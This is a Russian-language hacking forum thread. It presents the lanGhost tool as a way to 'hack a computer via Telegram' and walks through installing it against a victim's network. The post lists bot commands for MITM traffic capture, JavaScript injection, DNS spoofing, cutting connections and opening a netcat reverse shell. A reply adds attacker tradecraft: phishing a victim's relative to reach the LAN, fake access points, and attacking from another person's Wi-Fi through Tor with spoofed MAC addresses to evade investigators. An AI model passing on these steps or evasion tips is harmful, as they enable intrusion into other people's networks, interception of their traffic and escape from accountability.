Интересно lanGhost: взлом компьютера через телеграмм

_Emma_

Pro Member
Сообщения
56
Оценка реакций
108

Что нам потребуется

  1. ОС Kali
  2. Python3
  3. Доступ к сети жертвы
  4. lanGHOST
  5. Телеграмм


Установка lanGHOST
Устанавливает Python

sudo apt install python3 python3-pip
Cкачиваем IanGHOST c github`а

git clone

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

Переходим в директорю

Запускаем

Шаг 1 setup.py: Вводим имя сети жертвы

Шаг 2 setup.py: Надо создать API ключ.Пишем боту BotFather в телеграмм и пишем /newbot.Пищем любое имя для нашего бота.Вводим имя пользователя(бота).В ответ получаем API ключ бота


Шаг 3 setup.py: Вводим код отправив его вашему боту.ГОТОВО


Вашему взору ФУНКЦИЯ

/scanip [TARGET-IP] - Scan a specific IP address.
/kill [TARGET-IP] - Stop the target's network connection.
/mitm [TARGET-IP] - Capture HTTP/DNS traffic from target.
/replaceimg [TARGET-IP] - Replace HTTP images requested by target.
/injectjs [TARGET-IP] [JS-FILE-URL] - Inject JavaScript into HTTP pages requested by target.
/spoofdns [TARGET-IP] [DOMAIN] [FAKE-IP] - Spoof DNS records for target.
/attacks - View currently running attacks.
/stop [ATTACK-ID] - Stop a currently running attack.
/restart - Restart lanGhost.
/reversesh [TARGET-IP] [PORT] - Create a netcat reverse shell to target.
/help - Display the help menu.
 

info.xak

New Member
Сообщения
1
Оценка реакций
0
Ты забыл наверное указать что ты взломаешь только тот пк который у тебя находится в сети в твоей сети, и + больше половина функций уже работать не будут, например замена всех фото на свою, не будет работать так как все это происходит через протокол http:// а сейчас не кто не заходит на такие сайт, сейчас все сайты идут через протокол https://
 

SuPro

Member
Сообщения
40
Оценка реакций
22
Ты забыл наверное указать что ты взломаешь только тот пк который у тебя находится в сети в твоей сети, и + больше половина функций уже работать не будут, например замена всех фото на свою, не будет работать так как все это происходит через протокол http:// а сейчас не кто не заходит на такие сайт, сейчас все сайты идут через протокол https://

А ты хорошенько подумай головой: все атаки на определенный аккаунт/человека - целевые. Есть куча методов, как заставить человека пройти на сайт по незащищенному протоколу. Сам факт целевой атаки уже подразумевает под собой подготовку. Снифинг, лживая точка доступа, фишинг компа бабушки жертвы с помощью поста с котятами с целью прониккновения в локальную сеть, откуда потом можно провести MITM-атаку и перехватить трафик. На что воображения хватит, то и делай. Только стоит предварительно перед этим пользоваться:
1. ОС без программных закладок+заранее провести ее аудит+нужные утилиты,желательно вшитые
2. Рабочую ОС запустить с виртуальной машины, которая сверху имеет еще одну виртуальную машину, через которую проходит трафик для отсеивания угроз. Даже если верхний уровень обнаружен, то еще одна виртуалка жива. Есть куча дистрибутивов которые стирают твою физическую работу и по максимуму затуманить деятельность. При этом сам ты как красная тряпка для быка.
3. Заранее сменить mac-адрес реальной машины и изучить работу сетей
4. Заходить в сеть для атак с чужого WI-FI, при этом позаботясь о том, чтоб твой трафик был напрвлен через сеть TOR
(поскрольку когда будут отправлять запрос о том, что вот кто-то нас ломанул, начнут тебя искать, но не смогут - скорее всего откажут в предоставлении инфы админы тора). А про чужой маршрутизатор - чтобы не палить свой.
5. Выходные виртуалки (необязательно одна) выполняют роль анализатора трафика - чтобы на вход к ОС не шли зловреды. При этом на каждой виртуалке не должно быть закладок и естественно можно использовать различные конфигурации прокси-серверов, при этом на внешней лучше использовать сам тор, а на внутренней любой надежный прокси-сервер с минимальным количеством узлов, чтобы было труднее узнать о шифрованном трафике.
6. можно еще использовать ssh туннели на выходной виртуалке.
7. Для обсепечения безопасности рабочей виртуалки можно использовать режим белых списков и работать там от имени простого пользователя
8. Безопасные шлюзы
Это вот самая основа ведения действий. А чтобы все это еще и осуществить, нужно знать администрирование, сами
устройства и оперциоку, плюс к этому еще и знания криптографии, все связанное с сетью и передачей данных, а также для глубокого анализа бинарники, чтобы анализировать процессы происходящие в операциоке и знание веба для знания того, что происходит при использовании того или иного сервиса.. Ну и как тебе такой наборчик?))
А я ведь еще и не знаю как сервисы взаимодействуют с железом и операционкой в целом, а также все тонкости протоколов всех уровней и работу сервисов, и транзитных узлов..))